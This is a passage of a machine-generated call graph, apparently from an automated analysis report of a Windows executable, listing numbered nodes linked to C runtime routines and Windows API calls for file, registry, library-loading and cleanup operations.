calls __dosmaperr 105000->105057 105002->105000 105004 400427 105002->105004 105003 4003f3 105058 3f2aac 26 API calls __cftof 105003->105058 105010 4009ae 105004->105010 105009 4003fd __wsopen_s 105009->104993 105060 400782 105010->105060 105013 4009e0 105092 3f2b55 20 API calls __dosmaperr 105013->105092 105014 4009f9 105078 3f5571 105014->105078 105017 4009fe 105018 400a07 105017->105018 105019 400a1e 105017->105019 105094 3f2b55 20 API calls __dosmaperr 105018->105094 105091 4006ed CreateFileW 105019->105091 105023 400a0c 105095 3f2b68 20 API calls __dosmaperr 105023->105095 105024 400ad4 GetFileType 105027 400adf GetLastError 105024->105027 105031 400b26 105024->105031 105026 400aa9 GetLastError 105097 3f2b32 20 API calls __dosmaperr 105026->105097 105098 3f2b32 20 API calls __dosmaperr 105027->105098 105028 400a57 105028->105024 105028->105026 105096 4006ed CreateFileW 105028->105096 105100 3f54ba 21 API calls 2 library calls 105031->105100 105033 4009e5 105093 3f2b68 20 API calls __dosmaperr 105033->105093 105034 400aed CloseHandle 105034->105033 105037 400b16 105034->105037 105036 400a9c 105036->105024 105036->105026 105099 3f2b68 20 API calls __dosmaperr 105037->105099 105039 400b47 105041 400b93 105039->105041 105101 4008fe 72 API calls 3 library calls 105039->105101 105040 400b1b 105040->105033 105045 400bc0 105041->105045 105102 4004a0 72 API calls 3 library calls 105041->105102 105044 400bb9 105044->105045 105046 400bd1 105044->105046 105103 3f89fe 105045->105103 105048 40044b 105046->105048 105049 400c4f CloseHandle 105046->105049 105059 400474 LeaveCriticalSection __wsopen_s 105048->105059 105118 4006ed CreateFileW 105049->105118 105051 400c7a 105052 400c84 GetLastError 105051->105052 105053 400cb0 105051->105053 105119 3f2b32 20 API calls __dosmaperr 105052->105119 105053->105048 105055 400c90 105120 3f5683 21 API calls 2 library calls 105055->105120 105057->105003 105058->105009 105059->105009 105061 4007bd 105060->105061 105062 4007a3 105060->105062 105121 400712 105061->105121 105062->105061 105128 3f2b68 20 API calls __dosmaperr 105062->105128 105065 4007b2 105129 3f2aac 26 API calls __cftof 105065->105129 105067 4007f5 105068 400824 105067->105068 105130 3f2b68 20 API calls __dosmaperr 105067->105130 105076 400877 105068->105076 105132 3eda5d 26 API calls 2 library calls 105068->105132 105071 400872 105073 4008f1 105071->105073 105071->105076 105072 400819 105131 3f2aac 26 API calls __cftof 105072->105131 105133 3f2abc 11 API calls _abort 105073->105133 105076->105013 105076->105014 105077 4008fd 105079 3f557d ___DestructExceptionObject 105078->105079 105136 3f32ae EnterCriticalSection 105079->105136 105082 3f55a9 105140 3f5350 21 API calls 3 library calls 105082->105140 105083 3f55f4 __wsopen_s 105083->105017 105085 3f5584 105085->105082 105087 3f5617 EnterCriticalSection 105085->105087 105090 3f55cb 105085->105090 105086 3f55ae 105086->105090 105141 3f5497 EnterCriticalSection 105086->105141 105088 3f5624 LeaveCriticalSection 105087->105088 105087->105090 105088->105085 105137 3f567a 105090->105137 105091->105028 105092->105033 105093->105048 105094->105023 105095->105033 105096->105036 105097->105033 105098->105034 105099->105040 105100->105039 105101->105041 105102->105044 105143 3f5714 105103->105143 105105 3f8a14 105156 3f5683 21 API calls 2 library calls 105105->105156 105106 3f8a46 105106->105105 105110 3f5714 __wsopen_s 26 API calls 105106->105110 105107 3f8a0e 105107->105105 105107->105106 105109 3f5714 __wsopen_s 26 API calls 105107->105109 105112 3f8a3d 105109->105112 105113 3f8a52 FindCloseChangeNotification 105110->105113 105111 3f8a6c 105114 3f8a8e 105111->105114 105157 3f2b32 20 API calls __dosmaperr 105111->105157 105115 3f5714 __wsopen_s 26 API calls 105112->105115 105113->105105 105116 3f8a5e GetLastError 105113->105116 105114->105048 105115->105106 105116->105105 105118->105051 105119->105055 105120->105053 105122 40072a 105121->105122 105124 400745 105122->105124 105134 3f2b68 20 API calls __dosmaperr 105122->105134 105124->105067 105125 400769 105135 3f2aac 26 API calls __cftof 105125->105135 105127 400774 105127->105067 105128->105065 105129->105061 105130->105072 105131->105068 105132->105071 105133->105077 105134->105125 105135->105127 105136->105085 105142 3f32f6 LeaveCriticalSection 105137->105142 105139 3f5681 105139->105083 105140->105086 105141->105090 105142->105139 105144 3f5721 105143->105144 105147 3f5736 105143->105147 105158 3f2b55 20 API calls __dosmaperr 105144->105158 105146 3f5726 105159 3f2b68 20 API calls __dosmaperr 105146->105159 105151 3f575b 105147->105151 105160 3f2b55 20 API calls __dosmaperr 105147->105160 105149 3f5766 105161 3f2b68 20 API calls __dosmaperr 105149->105161 105151->105107 105153 3f572e 105153->105107 105154 3f576e 105162 3f2aac 26 API calls __cftof 105154->105162 105156->105111 105157->105114 105158->105146 105159->105153 105160->105149 105161->105154 105162->105153 105163 3c1033 105168 3c5714 105163->105168 105167 3c1042 105169 3cae03 22 API calls 105168->105169 105170 3c5782 105169->105170 105176 3c4648 105170->105176 105173 3c581f 105174 3c1038 105173->105174 105179 3c5974 22 API calls __fread_nolock 105173->105179 105175 3e03f3 29 API calls __onexit 105174->105175 105175->105167 105180 3c4674 105176->105180 105179->105173 105181 3c4667 105180->105181 105182 3c4681 105180->105182 105181->105173 105182->105181 105183 3c4688 RegOpenKeyExW 105182->105183 105183->105181 105184 3c46a2 RegQueryValueExW 105183->105184 105185 3c46d8 RegCloseKey 105184->105185 105186 3c46c3 105184->105186 105185->105181 105186->105185 105187 3ef04e 105188 3ef05a ___DestructExceptionObject 105187->105188 105189 3ef07b 105188->105189 105190 3ef066 105188->105190 105200 3e94dd EnterCriticalSection 105189->105200 105206 3f2b68 20 API calls __dosmaperr 105190->105206 105193 3ef06b 105207 3f2aac 26 API calls __cftof 105193->105207 105194 3ef087 105201 3ef0bb 105194->105201 105197 3ef076 __wsopen_s 105200->105194 105209 3ef0e6 105201->105209 105203 3ef0c8 105204 3ef094 105203->105204 105229 3f2b68 20 API calls __dosmaperr 105203->105229 105208 3ef0b1 LeaveCriticalSection __fread_nolock 105204->105208 105206->105193 105207->105197 105208->105197 105210 3ef10e 105209->105210 105211 3ef0f4 105209->105211 105230 3edca5 105210->105230 105240 3f2b68 20 API calls __dosmaperr 105211->105240 105214 3ef117 105237 3f9759 105214->105237 105215 3ef0f9 105241 3f2aac 26 API calls __cftof 105215->105241 105219 3ef104 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105219->105203 105220 3ef19f 105224 3ef1bc 105220->105224 105225 3ef1ce 105220->105225 105221 3ef21b 105222 3ef228 105221->105222 105221->105225 105243 3f2b68 20 API calls __dosmaperr 105222->105243 105242 3ef3ff 31 API calls 4 library calls 105224->105242 105225->105219 105244 3ef27b 30 API calls 2 library calls 105225->105244 105227 3ef1c6 105227->105219 105229->105204 105231 3edcc6 105230->105231 105232 3edcb1 105230->105232 105231->105214 105245 3f2b68 20 API calls __dosmaperr 105232->105245 105234 3edcb6 105246 3f2aac 26 API calls __cftof 105234->105246 105236 3edcc1 105236->105214 105247 3f95d6 105237->105247 105239 3ef133 105239->105219 105239->105220 105239->105221 105240->105215 105241->105219 105242->105227 105243->105219 105244->105219 105245->105234 105246->105236 105248 3f95e2 ___DestructExceptionObject 105247->105248 105249 3f95ea 105248->105249 105250 3f9602 105248->105250 105282 3f2b55 20 API calls __dosmaperr 105249->105282 105252 3f96b6 105250->105252 105255 3f963a 105250->105255 105287 3f2b55 20 API calls __dosmaperr 105252->105287 105253 3f95ef 105283 3f2b68 20 API calls __dosmaperr 105253->105283 105272 3f5497 EnterCriticalSection 105255->105272 105256 3f96bb 105288 3f2b68 20 API calls __dosmaperr 105256->105288 105260 3f95f7 __wsopen_s 105260->105239 105261 3f9640 105263 3f9679 105261->105263 105264 3f9664 105261->105264 105262 3f96c3 105289 3f2aac 26 API calls __cftof 105262->105289 105273 3f96db 105263->105273 105284 3f2b68 20 API calls __dosmaperr 105264->105284 105268 3f9669 105285 3f2b55 20 API calls __dosmaperr 105268->105285 105269 3f9674 105286 3f96ae LeaveCriticalSection __wsopen_s 105269->105286 105272->105261 105274 3f5714 __wsopen_s 26 API calls 105273->105274 105275 3f96ed 105274->105275 105276 3f9706 SetFilePointerEx 105275->105276 105277 3f96f5 105275->105277 105279 3f971e GetLastError 105276->105279 105281 3f96fa 105276->105281 105290 3f2b68 20 API calls __dosmaperr 105277->105290 105291 3f2b32 20 API calls __dosmaperr 105279->105291 105281->105269 105282->105253 105283->105260 105284->105268 105285->105269 105286->105260 105287->105256 105288->105262 105289->105260 105290->105281 105291->105281 105292 402752 105295 3c433c 105292->105295 105296 3c437b mciSendStringW 105295->105296 105297 403d7f DestroyWindow 105295->105297 105298 3c4397 105296->105298 105299 3c45f2 105296->105299 105309 403d8b 105297->105309 105300 3c43a5 105298->105300 105298->105309 105299->105298 105301 3c4601 UnregisterHotKey 105299->105301 105332 3c42ae 105300->105332 105301->105299 105303 403da9 FindClose 105303->105309 105304 403d9f 105304->105309 105343 3c6903 CloseHandle 105304->105343 105306 403dd0 105310 403de3 FreeLibrary 105306->105310 105311 403df4 105306->105311 105308 3c43ba 105308->105311 105318 3c43c8 105308->105318 105309->105303 105309->105304 105309->105306 105310->105306 105312 403e08 VirtualFree 105311->105312 105313 403e36 105311->105313 105312->105311 105315 3c4435 105313->105315 105336 430876 105313->105336 105314 3c4424 OleUninitialize 105314->105313 105314->105315 105316 403e50 105315->105316 105317 3c4440 105315->105317 105324 403e5f ISource 105316->105324 105344 433a5a 6 API calls ISource 105316->105344 105319 3c4450 105317->105319 105318->105314 105341 3c4158 24 API calls 105319->105341 105322 3c4466 105342 3c4873 22 API calls 105322->105342 105327 403eee 105324->105327 105345 426bcd 22 API calls ISource 105324->105345 105327->105327 105333 3c42bb 105332->105333 105334 3c42e0 105333->105334 105346 427723 22 API calls 105333->105346 105334->105306 105334->105308 105347 43103c 105336->105347 105339 430895 105340 4308a9 DeleteCriticalSection 105339->105340 105340->105315 105341->105322 105343->105304 105344->105316 105345->105324 105346->105333 105348 431045 InterlockedExchange 105347->105348 105349 430884 FindCloseChangeNotification 105347->105349 105348->105349 105350 431059 EnterCriticalSection TerminateThread WaitForSingleObject 105348->105350 105349->105339 105351 431093 InterlockedExchange LeaveCriticalSection 105350->105351 105352 431086 CloseHandle 105350->105352 105351->105349 105352->105351 105353 3c31c8 105354 3c31d5 __wsopen_s 105353->105354 105355 403330 ___scrt_fastfail 105354->105355 105356 3c31ee 105354->105356 105358 40334c GetOpenFileNameW 105355->105358 105357 3c3ff7 23 API calls 105356->105357 105359 3c31f7 105357->105359 105360 40339b 105358->105360 105369 3c318a 105359->105369 105363 3c7467 22 API calls 105360->105363 105365 4033b0 105363->105365 105365->105365 105366 3c320c 105387 3c515f 105366->105387 105370 4022a0 __wsopen_s 105369->105370 105371 3c3197 GetLongPathNameW 105370->105371 105372 3c7467 22 API calls 105371->105372 105373 3c31bf 105372->105373 105374 3c3c2f 105373->105374 105375 3cae03 22 API calls 105374->105375 105376 3c3c41 105375->105376 105377 3c3ff7 23 API calls 105376->105377 105378 3c3c4c 105377->105378 105379 3c3c57 105378->105379 105384 403b44 105378->105384 105380 3c58dc 22 API calls 105379->105380 105382 3c3c63 105380->105382 105417 3c12f4 105382->105417 105385 403b66 105384->105385 105423 3de224 41 API calls 105384->105423 105386 3c3c76 105386->105366 105424 3c54de 105387->105424 105390 40436b 105446 4333e2 105390->105446 105391 3c54de 94 API calls 105393 3c5198 105391->105393 105393->105390 105395 3c51a0 105393->105395 105394 40437c 105396 404380 105394->105396 105397 40439d 105394->105397 105399 3c51ac 105395->105399 105400 404388 105395->105400 105496 3c554c 105396->105496 105398 3e015b 22 API calls 105397->105398 105409 4043e2 105398->105409 105495 3c326c 135 API calls 2 library calls 105399->105495 105502 42e048 82 API calls 105400->105502 105404 404396 105404->105397 105405 3c3216 105406 404593 105412 40459b 105406->105412 105407 3c554c 68 API calls 105407->105412 105409->105406 105409->105412 105414 3ca1d4 22 API calls 105409->105414 105472 429d32 105409->105472 105475 431243 105409->105475 105481 3caa39 105409->105481 105489 3c4bb8 105409->105489 105503 429c61 42 API calls _wcslen 105409->105503 105412->105407 105504 429f4f 82 API calls __wsopen_s 105412->105504 105414->105409 105418 3c1306 105417->105418 105422 3c1325 __fread_nolock 105417->105422 105421 3e015b 22 API calls 105418->105421 105419 3e012b 22 API calls 105420 3c133c 105419->105420 105420->105386 105421->105422 105422->105419 105423->105384 105505 3c54a3 LoadLibraryA 105424->105505 105429 404660 105432 3c554c 68 API calls 105429->105432 105430 3c5509 LoadLibraryExW 105513 3c546c LoadLibraryA 105430->105513 105434 404667 105432->105434 105436 3c546c 3 API calls 105434->105436 105438 40466f 105436->105438 105437 3c5533 105437->105438 105439 3c553f 105437->105439 105534 3c56aa 105438->105534 105440 3c554c 68 API calls 105439->105440 105442 3c5184 105440->105442 105442->105390 105442->105391 105445 404696 105447 4333fe 105446->105447 105448 3c56d4 64 API calls 105447->105448 105449 433412 105448->105449 105805 433551 105449->105805 105452 3c56aa 40 API calls 105453 433441 105452->105453 105454 3c56aa 40 API calls 105453->105454 105455 433451 105454->105455 105456 3c56aa 40 API calls 105455->105456 105457 43346c 105456->105457 105458 3c56aa 40 API calls 105457->105458 105459 433487 105458->105459 105460 3c56d4 64 API calls 105459->105460 105461 43349e 105460->105461 105462 3eed5c ___std_exception_copy 21 API calls 105461->105462 105463 4334a5 105462->105463 105464 3eed5c ___std_exception_copy 21 API calls 105463->105464 105465 4334af 105464->105465 105466 3c56aa 40 API calls 105465->105466 105467 4334c3 105466->105467 105468 432fe7 27 API calls 105467->105468 105470 4334d9 105468->105470 105469 43342a 105469->105394 105470->105469 105811 4329b7 79 API calls 105470->105811 105473 3e015b 22 API calls 105472->105473 105474 429d62 __fread_nolock 105473->105474 105474->105409 105476 43124e 105475->105476 105477 3e012b 22 API calls 105476->105477 105478 431265 105477->105478 105479 3ca1d4 22 API calls 105478->105479 105480 431270 105479->105480 105480->105409 105482 3caac3 105481->105482 105488 3caa49 __fread_nolock 105481->105488 105484 3e015b 22 API calls 105482->105484 105483 3e012b 22 API calls 105485 3caa50 105483->105485 105484->105488 105486 3e012b 22 API calls 105485->105486 105487 3caa6e 105485->105487 105486->105487 105487->105409 105488->105483 105490 3c4bcb 105489->105490 105493 3c4c6f 105489->105493 105491 3e015b 22 API calls 105490->105491 105492 3c4bfd 105490->105492 105491->105492 105492->105493 105494 3e012b 22 API calls 105492->105494 105493->105409 105494->105492 105495->105405 105497 3c5556 105496->105497 105499 3c555d 105496->105499 105812 3ee9c8 105497->105812 105500 3c5574 105499->105500 105501 4046bc FreeLibrary 105499->105501 105500->105400 105502->105404 105503->105409 105504->105412 105506 3c54d9 105505->105506 105507 3c54bb GetProcAddress 105505->105507 105510 3ee93b 105506->105510 105508 3c54cb 105507->105508 105508->105506 105509 3c54d2 FreeLibrary 105508->105509 105509->105506 105542 3ee87a 105510->105542 105512 3c54fd 105512->105429 105512->105430 105514 3c54a0 105513->105514 105515 3c5481 GetProcAddress 105513->105515 105518 3c5580 105514->105518 105516 3c5491 105515->105516 105516->105514 105517 3c5499 FreeLibrary 105516->105517 105517->105514 105519 3e015b 22 API calls 105518->105519 105520 3c5595 105519->105520 105521 3c3966 22 API calls 105520->105521 105522 3c55a1 __fread_nolock 105521->105522 105523 4046da 105522->105523 105527 3c55dc 105522->105527 105608 433738 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 105522->105608 105609 4337bc 74 API calls 105523->105609 105526 3c56aa 40 API calls 105526->105527 105527->105526 105528 40471e 105527->105528 105529 3c56d4 64 API calls 105527->105529 105531 3c5670 ISource 105527->105531 105603 3c56d4 105528->105603 105529->105527 105531->105437 105533 3c56aa 40 API calls 105533->105531 105535 3c56bc 105534->105535 105536 404778 105534->105536 105656 3eec14 105535->105656 105539 432fe7 105788 432e37 105539->105788 105541 433002 105541->105445 105545 3ee886 ___DestructExceptionObject 105542->105545 105543 3ee894 105567 3f2b68 20 API calls __dosmaperr 105543->105567 105545->105543 105547 3ee8c4 105545->105547 105546 3ee899 105568 3f2aac 26 API calls __cftof 105546->105568 105549 3ee8c9 105547->105549 105550 3ee8d6 105547->105550 105569 3f2b68 20 API calls __dosmaperr 105549->105569 105559 3f83b1 105550->105559 105553 3ee8df 105555 3ee8e5 105553->105555 105556 3ee8f2 105553->105556 105554 3ee8a4 __wsopen_s 105554->105512 105570 3f2b68 20 API calls __dosmaperr 105555->105570 105571 3ee924 LeaveCriticalSection __fread_nolock 105556->105571 105560 3f83bd ___DestructExceptionObject 105559->105560 105572 3f32ae EnterCriticalSection 105560->105572 105562 3f83cb 105573 3f844b 105562->105573 105566 3f83fc __wsopen_s 105566->105553 105567->105546 105568->105554 105569->105554 105570->105554 105571->105554 105572->105562 105581 3f846e 105573->105581 105574 3f83d8 105587 3f8407 105574->105587 105575 3f84c7 105592 3f4fcd 20 API calls 2 library calls 105575->105592 105577 3f84d0 105593 3f2d18 105577->105593 105580 3f84d9 105580->105574 105599 3f3755 11 API calls 2 library calls 105580->105599 105581->105574 105581->105575 105581->105581 105590 3e94dd EnterCriticalSection 105581->105590 105591 3e94f1 LeaveCriticalSection 105581->105591 105583 3f84f8 105600 3e94dd EnterCriticalSection 105583->105600 105586 3f850b 105586->105574 105602 3f32f6 LeaveCriticalSection 105587->105602 105589 3f840e 105589->105566 105590->105581 105591->105581 105592->105577 105594 3f2d23 RtlFreeHeap 105593->105594 105598 3f2d4c __dosmaperr 105593->105598 105595 3f2d38 105594->105595 105594->105598 105601 3f2b68 20 API calls __dosmaperr 105595->105601 105597 3f2d3e GetLastError 105597->105598 105598->105580 105599->105583 105600->105586 105601->105597 105602->105589 105604 3c56e3 105603->105604 105606 404798 105603->105606 105610 3ef033 105604->105610 105608->105523 105609->105527 105613 3eedfa 105610->105613 105612 3c56f1 105612->105533 105614 3eee06 ___DestructExceptionObject 105613->105614 105615 3eee12 105614->105615 105616 3eee38 105614->105616 105638 3f2b68 20 API calls __dosmaperr 105615->105638 105626 3e94dd EnterCriticalSection 105616->105626 105619 3eee17 105639 3f2aac 26 API calls __cftof 105619->105639 105620 3eee44 105627 3eef5a 105620->105627 105623 3eee58 105640 3eee77 LeaveCriticalSection __fread_nolock 105623->105640 105625 3eee22 __wsopen_s 105625->105612 105626->105620 105628 3eef7c 105627->105628 105629 3eef6c 105627->105629 105641 3eee81 105628->105641 105654 3f2b68 20 API calls __dosmaperr 105629->105654 105632 3eef71 105632->105623 105633 3ef01e 105633->105623 105634 3eef9f 105634->105633 105645 3edf5b 105634->105645 105638->105619 105639->105625 105640->105625 105642 3eee8d 105641->105642 105643 3eee94 105641->105643 105642->105634 105643->105642 105644 3f9774 __wsopen_s 28 API calls 105643->105644 105644->105642 105646 3edf73 105645->105646 105650 3edf6f 105645->105650 105647 3edca5 __fread_nolock 26 API calls 105646->105647 105646->105650 105648 3edf93 105647->105648 105655 3f5d0e 62 API calls 4 library calls 105648->105655 105651 3f9774 105650->105651 105652 3f96db __wsopen_s 28 API calls 105651->105652 105653 3f978a 105652->105653 105653->105633 105654->105632 105655->105650 105659 3eec31 105656->105659 105658 3c56cd 105658->105539 105660 3eec3d ___DestructExceptionObject 105659->105660 105661 3eec7d 105660->105661 105662 3eec50 ___scrt_fastfail 105660->105662 105663 3eec75 __wsopen_s 105660->105663 105672 3e94dd EnterCriticalSection 105661->105672 105686 3f2b68 20 API calls __dosmaperr 105662->105686 105663->105658 105666 3eec87 105673 3eea48 105666->105673 105667 3eec6a 105687 3f2aac 26 API calls __cftof 105667->105687 105672->105666 105674 3eea77 105673->105674 105677 3eea5a ___scrt_fastfail 105673->105677 105688 3eecbc LeaveCriticalSection __fread_nolock 105674->105688 105675 3eea67 105754 3f2b68 20 API calls __dosmaperr 105675->105754 105677->105674 105677->105675 105679 3eeaba __fread_nolock 105677->105679 105679->105674 105680 3eebd6 ___scrt_fastfail 105679->105680 105682 3edca5 __fread_nolock 26 API calls 105679->105682 105689 3f9095 105679->105689 105756 3ed2c8 26 API calls 4 library calls 105679->105756 105757 3f2b68 20 API calls __dosmaperr 105680->105757 105682->105679 105684 3eea6c 105755 3f2aac 26 API calls __cftof 105684->105755 105686->105667 105687->105663 105688->105663 105690 3f90bf 105689->105690 105691 3f90a7 105689->105691 105692 3f9429 105690->105692 105696 3f9104 105690->105696 105767 3f2b55 20 API calls __dosmaperr 105691->105767 105782 3f2b55 20 API calls __dosmaperr 105692->105782 105694 3f90ac 105768 3f2b68 20 API calls __dosmaperr 105694->105768 105699 3f910f 105696->105699 105700 3f90b4 105696->105700 105707 3f913f 105696->105707 105698 3f942e 105783 3f2b68 20 API calls __dosmaperr 105698->105783 105769 3f2b55 20 API calls __dosmaperr 105699->105769 105700->105679 105702 3f911c 105784 3f2aac 26 API calls __cftof 105702->105784 105704 3f9114 105770 3f2b68 20 API calls __dosmaperr 105704->105770 105708 3f9158 105707->105708 105709 3f917e 105707->105709 105710 3f919a 105707->105710 105708->105709 105743 3f9165 105708->105743 105771 3f2b55 20 API calls __dosmaperr 105709->105771 105774 3f3b70 21 API calls 2 library calls 105710->105774 105712 3f9183 105772 3f2b68 20 API calls __dosmaperr 105712->105772 105716 3f91b1 105719 3f2d18 _free 20 API calls 105716->105719 105717 3f918a 105773 3f2aac 26 API calls __cftof 105717->105773 105718 3f9303 105721 3f9379 105718->105721 105724 3f931c GetConsoleMode 105718->105724 105722 3f91ba 105719->105722 105723 3f937d ReadFile 105721->105723 105725 3f2d18 _free 20 API calls 105722->105725 105726 3f9397 105723->105726 105727 3f93f1 GetLastError 105723->105727 105724->105721 105728 3f932d 105724->105728 105729 3f91c1 105725->105729 105726->105727 105733 3f936e 105726->105733 105732 3f93fe 105727->105732 105739 3f9355 105727->105739 105728->105723 105734 3f9333 ReadConsoleW 105728->105734 105730 3f91cb 105729->105730 105731 3f91e6 105729->105731 105775 3f2b68 20 API calls __dosmaperr 105730->105775 105737 3f9774 __wsopen_s 28 API calls 105731->105737 105780 3f2b68 20 API calls __dosmaperr 105732->105780 105747 3f93bc 105733->105747 105748 3f93d3 105733->105748 105751 3f9195 __fread_nolock 105733->105751 105734->105733 105738 3f934f GetLastError 105734->105738 105737->105743 105738->105739 105739->105751 105777 3f2b32 20 API calls __dosmaperr 105739->105777 105740 3f2d18 _free 20 API calls 105740->105700 105741 3f91d0 105776 3f2b55 20 API calls __dosmaperr 105741->105776 105742 3f9403 105781 3f2b55 20 API calls __dosmaperr 105742->105781 105758 3ffbee 105743->105758 105778 3f8db1 31 API calls 3 library calls 105747->105778 105750 3f93ea 105748->105750 105748->105751 105779 3f8bf1 29 API calls __wsopen_s 105750->105779 105751->105740 105753 3f93ef 105753->105751 105754->105684 105755->105674 105756->105679 105757->105684 105759 3ffbfb 105758->105759 105760 3ffc08 105758->105760 105785 3f2b68 20 API calls __dosmaperr 105759->105785 105763 3ffc14 105760->105763 105786 3f2b68 20 API calls __dosmaperr 105760->105786 105762 3ffc00 105762->105718 105763->105718 105765 3ffc35 105787 3f2aac 26 API calls __cftof 105765->105787 105767->105694 105768->105700 105769->105704 105770->105702 105771->105712 105772->105717 105773->105751 105774->105716 105775->105741 105776->105751 105777->105751 105778->105751 105779->105753 105780->105742 105781->105751 105782->105698 105783->105702 105784->105700 105785->105762 105786->105765 105787->105762 105791 3ee838 105788->105791 105790 432e46 105790->105541 105794 3ee7b9 105791->105794 105793 3ee855 105793->105790 105795 3ee7dc 105794->105795 105796 3ee7c8 105794->105796 105800 3ee7d8 __alldvrm 105795->105800 105804 3f368f 11 API calls 2 library calls 105795->105804 105802 3f2b68 20 API calls __dosmaperr 105796->105802 105799 3ee7cd 105803 3f2aac 26 API calls __cftof 105799->105803 105800->105793 105802->105799 105803->105800 105804->105800 105810 433565 105805->105810 105806 3c56aa 40 API calls 105806->105810 105807 433426 105807->105452 105807->105469 105808 432fe7 27 API calls 105808->105810 105809 3c56d4 64 API calls 105809->105810 105810->105806 105810->105807 105810->105808 105810->105809 105811->105469 105813 3ee9d4 ___DestructExceptionObject 105812->105813 105814 3ee9fa 105813->105814 105815 3ee9e5 105813->105815 105824 3ee9f5 __wsopen_s 105814->105824 105827 3e94dd EnterCriticalSection 105814->105827 105825 3f2b68 20 API calls __dosmaperr 105815->105825 105817 3ee9ea 105826 3f2aac 26 API calls __cftof 105817->105826 105820 3eea16 105828 3ee952 105820->105828 105822 3eea21 105844 3eea3e LeaveCriticalSection __fread_nolock 105822->105844 105824->105499 105825->105817 105826->105824 105827->105820 105829 3ee95f 105828->105829 105830 3ee974 105828->105830 105845 3f2b68 20 API calls __dosmaperr 105829->105845 105832 3edf5b 62 API calls 105830->105832 105834 3ee96f 105830->105834 105835 3ee988 105832->105835 105833 3ee964 105846 3f2aac 26 API calls __cftof 105833->105846 105834->105822 105847 3f50ca 105835->105847 105839 3edca5 __fread_nolock 26 API calls 105840 3ee996 105839->105840 105851 3f897f 105840->105851 105843 3f2d18 _free 20 API calls 105843->105834 105844->105824 105845->105833 105846->105834 105848 3ee990 105847->105848 105849 3f50e0 105847->105849 105848->105839 105849->105848 105850 3f2d18 _free 20 API calls 105849->105850 105850->105848 105852 3f898e 105851->105852 105855 3f89a3 105851->105855 105866 3f2b55 20 API calls __dosmaperr 105852->105866 105853 3f89de 105871 3f2b55 20 API calls __dosmaperr 105853->105871 105855->105853 105858 3f89ca 105855->105858 105857 3f8993 105867 3f2b68 20 API calls __dosmaperr 105857->105867 105868 3f8957 105858->105868 105859 3f89e3 105872 3f2b68 20 API calls __dosmaperr 105859->105872 105863 3ee99c 105863->105834 105863->105843 105864 3f89eb 105873 3f2aac 26 API calls __cftof 105864->105873 105866->105857 105867->105863 105874 3f88d5 105868->105874 105870 3f897b 105870->105863 105871->105859 105872->105864 105873->105863 105875 3f88e1 ___DestructExceptionObject 105874->105875 105885 3f5497 EnterCriticalSection 105875->105885 105877 3f88ef 105878 3f8916 105877->105878 105879 3f8921 105877->105879 105880 3f89fe __wsopen_s 29 API calls 105878->105880 105886 3f2b68 20 API calls __dosmaperr 105879->105886 105882 3f891c 105880->105882 105887 3f894b LeaveCriticalSection __wsopen_s 105882->105887 105884 3f893e __wsopen_s 105884->105870 105885->105877 105886->105882 105887->105884 105888 3f944a 105889 3f946f 105888->105889 105890 3f9457 105888->105890 105894 3f94ca 105889->105894 105902 3f9467 105889->105902 105940 400117 21 API calls 2 library calls 105889->105940 105938 3f2b68 20 API calls __dosmaperr 105890->105938 105892 3f945c 105939 3f2aac 26 API calls __cftof 105892->105939 105896 3edca5 __fread_nolock 26 API calls 105894->105896 105897 3f94e2 105896->105897 105908 3f8f82 105897->105908 105899 3f94e9 105900 3edca5 __fread_nolock 26 API calls 105899->105900 105899->105902 105901 3f9515 105900->105901 105901->105902 105903 3edca5 __fread_nolock 26 API calls 105901->105903 105904 3f9523 105903->105904 105904->105902 105905 3edca5 __fread_nolock 26 API calls 105904->105905 105906 3f9533 105905->105906 105907 3edca5 __fread_nolock 26 API calls 105906->105907 105907->105902 105909 3f8f8e ___DestructExceptionObject 105908->105909 105910 3f8fae 105909->105910 105911 3f8f96 105909->105911 105913 3f9074 105910->105913 105918 3f8fe7 105910->105918 105942 3f2b55 20 API calls __dosmaperr 105911->105942 105949 3f2b55 20 API calls __dosmaperr 105913->105949 105915 3f8f9b 105943 3f2b68 20 API calls __dosmaperr 105915->105943 105916 3f9079 105950 3f2b68 20 API calls __dosmaperr 105916->105950 105921 3f900b 105918->105921 105922 3f8ff6 105918->105922 105920 3f8fa3 __wsopen_s 105920->105899 105941 3f5497 EnterCriticalSection 105921->105941 105944 3f2b55 20 API calls __dosmaperr 105922->105944 105924 3f9003 105951 3f2aac 26 API calls __cftof 105924->105951 105926 3f9011 105928 3f902d 105926->105928 105929 3f9042 105926->105929 105927 3f8ffb 105945 3f2b68 20 API calls __dosmaperr 105927->105945 105946 3f2b68 20 API calls __dosmaperr 105928->105946 105933 3f9095 __fread_nolock 38 API calls 105929->105933 105936 3f903d 105933->105936 105934 3f9032 105947 3f2b55 20 API calls __dosmaperr 105934->105947 105948 3f906c LeaveCriticalSection __wsopen_s 105936->105948 105938->105892 105939->105902 105940->105894 105941->105926 105942->105915 105943->105920 105944->105927 105945->105924 105946->105934 105947->105936 105948->105920 105949->105916 105950->105924 105951->105920 105952 3e074b 105953 3e0757 ___DestructExceptionObject 105952->105953 105981 3e0201 105953->105981 105955 3e075e 105956 3e08b1 105955->105956 105959 3e0788 105955->105959 106011 3e0b8f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 105956->106011 105958 3e08b8 106004 3e51a2 105958->106004 105968 3e07c7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 105959->105968 105992 3f273d 105959->105992 105966 3e07a7 105972 3e0828 105968->105972 106007 3e516a 38 API calls 3 library calls 105968->106007 105971 3e082e 105973 3e0843 105971->105973 106000 3e0ca9 105972->106000 106008 3e0ce2 GetModuleHandleW 105973->106008 105975 3e084a 105975->105958 105976 3e084e 105975->105976 105977 3e0857 105976->105977 106009 3e5145 28 API calls _abort 105976->106009 106010 3e0390 13 API calls 2 library calls 105977->106010 105980 3e085f 105980->105966 105982 3e020a 105981->105982 106013 3e09e8 IsProcessorFeaturePresent 105982->106013 105984 3e0216 106014 3e2fe4 10 API calls 3 library calls 105984->106014 105986 3e021b 105991 3e021f 105986->105991 106015 3f25d7 105986->106015 105989 3e0236 105989->105955 105991->105955 105995 3f2754 105992->105995 105993 3e0ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 105994 3e07a1 105993->105994 105994->105966 105996 3f26e1 105994->105996 105995->105993 105999 3f2710 105996->105999 105997 3e0ddc 